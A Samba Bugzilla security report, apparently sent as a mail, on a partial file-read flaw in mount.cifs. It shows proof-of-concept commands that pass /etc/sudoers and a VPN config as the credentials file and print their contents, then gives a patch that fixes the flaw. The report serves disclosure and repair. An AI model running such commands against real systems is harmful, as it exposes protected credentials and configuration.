https://bugzilla.samba.org/show_bug.cgi?id=15026 Bug ID: 15026 Summary: Partial arbitrary file read via mount.cifs Product: CifsVFS Version: 5.x Hardware: All OS: All Status: NEW Severity: normal Priority: P5 Component: user space tools Assignee: jlayton@xxxxxxxxx Reporter: jbe@xxxxxxxxxxxx QA Contact: cifs-qa@xxxxxxxxx CC: sfrench@xxxxxxxxx Target Milestone: --- Partial arbitrary file read via mount.cifs The following was tested on cifs-utils version 6.14. The "credentials" option of mount.cifs binary allow for partial arbitrary file disclosure when the verbose flag is set. When a credential line is invalid, the following code is reached: 571 static int open_cred_file(char *file_name, 572 struct parsed_mount_info *parsed_info) 573 { ... 637 case CRED_UNPARSEABLE: 638 if (parsed_info->verboseflag) 639 fprintf(stderr, "Credential formatted " 640 "incorrectly: %s\n", 641 temp_val ? temp_val : "(null)"); Because of how credential files are formatted, any part of a line after an equal sign in an invalid line is printed. Such lines can be found in sensitive files: secure_path and rights in /etc/sudoers: $ ls -l /etc/sudoers -r--r----- 1 root root 670 Apr 20 2021 /etc/sudoers $ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o credentials=/etc/sudoers Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (ALL:ALL) ALL Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (ALL:ALL) ALL Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Password for root@//127.0.0.1/share: mount.cifs kernel mount options: ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=******** mount error(111): could not connect to 127.0.0.1Unable to find suitable address. Passwords in /etc/openfortivpn/config: $ ls -l /etc/openfortivpn/config -rw------- 1 root root 154 Aug 28 2021 /etc/openfortivpn/config $ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o credentials=/etc/openfortivpn/config Credential formatted incorrectly: (null) Credential formatted incorrectly: (null) Credential formatted incorrectly: vpn.example.org Credential formatted incorrectly: 443 Credential formatted incorrectly: vpnuser Credential formatted incorrectly: VPNpassw0rd Password for root@//127.0.0.1/share: mount.cifs kernel mount options: ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=******** mount error(111): could not connect to 127.0.0.1Unable to find suitable address. Note that either sudo rights on the mount.cifs binary or an entry in fstab are needed to perform the read. A possible mitigation is to get rid of the token value when printing the error in verbose mode: From: Jeffrey Bencteux <jbe@xxxxxxxxxxxx> Date: Sat, 19 Mar 2022 13:41:15 -0400 Subject: [PATCH] fix verbose message of credentials option When supposed credential line is invalid, the verbose message prints part of it. This lead to information disclosure when the credentials file given is sensitive and contains '=' signs. Signed-off-by: Jeffrey Bencteux <jbe@xxxxxxxxxxxx> --- mount.cifs.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/mount.cifs.c b/mount.cifs.c index 32521a7..82358a3 100644 --- a/mount.cifs.c +++ b/mount.cifs.c @@ -637,8 +637,7 @@ static int open_cred_file(char *file_name, case CRED_UNPARSEABLE: if (parsed_info->verboseflag) fprintf(stderr, "Credential formatted " - "incorrectly: %s\n", - temp_val ? temp_val : "(null)"); + "incorrectly\n"); break; } } -- 2.33.0 -- You are receiving this mail because: You are the QA Contact for the bug.
